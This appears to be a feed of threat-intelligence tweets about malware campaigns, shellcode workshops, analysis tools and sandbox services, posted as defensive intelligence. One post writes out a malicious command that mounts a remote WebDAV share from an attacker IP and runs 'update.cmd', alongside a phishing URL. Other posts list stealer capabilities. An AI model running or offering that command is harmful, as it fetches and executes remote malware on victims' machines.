ExecuteMalware

❗ macOS VM is now live ❗ 25K+ U.S. businesses already run on macOS. Yet #macOS threats remain a blind spot for many SOC teams. 👇 Close this gap now with a broader cross-platform threat visibility for faster and confident response! any.run/cybersecurity-…

Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:

GSocket Backdoor Delivered Through Bash Script isc.sans.edu/diary/32816

Tax season is open 🎯 New blog just dropped on a malvertising campaign targeting W-2/W-9 searches since January 2026 Google Ad -> dual-layer cloaking -> rogue ScreenConnect -> FatMalloc crypter (2GB alloc to choke AV emulators) -> previously undocumented Huawei audio driver killing EDR 60+ rogue SC instances across our customer base 💀 huntress.com/blog/w2-malver…

🚨 NEW VIDEO DROP FROM PANDA 🐼 I got a full walkthrough of @ThruntingLabs from @Kostastsale and this platform is different - no simulations. You are investigating REAL intrusions with REAL telemetry - query actual EDR logs in Elastic, Splunk, or Azure Log Analytics. If you're in blue team / SOC / IR or aspiring to be - I highly recommend checking it out 🔗 youtube.com/watch?v=YC-E5D…

🏗️ You can’t create reliable Windows shellcode without a precise understanding of the Windows API. It's more than knowing the function—you must understand call order, handle preservation, and manual structure parsing. Watch Part 2 of the workshop here: 📺 youtu.be/xdCfeC7o2Ss Once we move to assembly, the "safety net" is gone. No compiler to catch type mismatches or manage your stack: 🔹 You are the memory manager for your structures. 🔹 You must manually ensure calling conventions are followed. 🔹 You are responsible for calculating every member offset by hand.

If you like both #BinaryRefinery and #Claude, try out this skill I wrote: github.com/binref/agent/

🐚 Custom Windows shellcode is the ultimate way to learn OS internals and sharpen your assembly skills. 🗺️ Video 1: The Game Plan. We start in C to map out the APIs and logic before hitting the ASM. Watch Part 1: 📺 youtu.be/6oeMEzCKXyo ✅ Dev/Debug workflows ✅ Position-Independence (PIC) ✅ Module & API hashing ✅ Stack strings & Endianness ✅ XOR obfuscation & Decryption stubs

New blog post: Building a Pipeline for Agentic Malware Analysis Agentic RE + malware analysis with custom skills, MCP tooling, and persistent case state to automate intial triage Link: synthesis.to/2026/03/18/age… Github: github.com/mrphrazer/agen…

A lot of convenience added to #BinaryRefinery in 0.10.2 overall, so this might be a good time to update. Hey @greglesnewich, remember when you wanted DMG archive support? Guess what ...

#MuddyWater #Backdoor #Dindoor What it does: ▪️ Steals Chrome/Firefox passwords & cookies ▪️ Dumps crypto wallets (Exodus, Atomic, +15 more) ▪️ Grabs Discord tokens & SSH keys ▪️ Takes screenshots via Windows API ▪️ Full PTY shell access C2 uses WebSocket + HTTP fallback with server rotation #MuddyWater #MalwareAnalysis #Cybersecurity #DFIR #Iran #APT C2✅ - OnLine app.any.run/tasks/6bf329f8…

Nice update to @anyrun_app that seems easy to miss: HTTPS decryption. If you look at the network traffic, click Network Threats, you can click into the analysis to see the decrypted traffic You can also just download the entire decrypted PCAP. 1/3

👇 http://rbcoeconsulting.]com/wp-content/plugins/pretty-manager/captcha.html 👇 cmd /c net use Z: http://94.156.170.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete 👇 app.any.run/tasks/80717be8…

Phishing activity in the past 7 days 🐟 Track latest #phishing threats in TI Lookup: intelligence.any.run/analysis/looku… #TopPhishingThreats

👿 TrustConnect is a $300/month #RAT-as-a-Service hiding inside fake Zoom, Teams & Adobe installers. Signed with a fraudulent EV cert, streaming your screen via WebSocket, rebuilding under a new brand hours after takedown. 👉 Tech details & business impact: any.run/malware-trends…

New XWorm 7.1 and Remcos RAT Attacks Abuse Windows Tools to Evade Detection hackread.com/xworm-7-1-remc…

IcedID Config extraction: Writeup for a challenge part of Zero2Auto malware analysis course. txc.gitbook.io/documentation/… Also tried out the @REMnux MCP server to check out, how AI can support my analysis approaches and learning overall

🦔 📹 Video: Building your own AI Malware Analysis Lab ➡️ old system, 16 GB RAM ➡️ using Remnux #MalwareAnalysisForHedgehogs #LLM youtube.com/watch?v=YOduz8…

Top 10 last week's threats by uploads 🌐 ⬆️ #Asyncrat 782 (533) ⬆️ #Xworm 431 (350) ⬆️ #Dcrat 427 (268) ⬆️ #Stealc 403 (215) ⬆️ #Vidar 351 (249) ⬆️ #Agenttesla 309 (241) ⬆️ #Gh0st 281 (143) ⬆️ #Remcos 270 (193) ⬆️ #Quasar 187 (158) ⬇️ #Salatstealer 181 (189) Explore malware in action: #register" target="_blank" rel="nofollow noopener">app.any.run/?utm_source=tw… #Top10Malware

If a website asks you to press Win+R and paste something into a command prompt: don't. malwarebytes.com/blog/threat-in…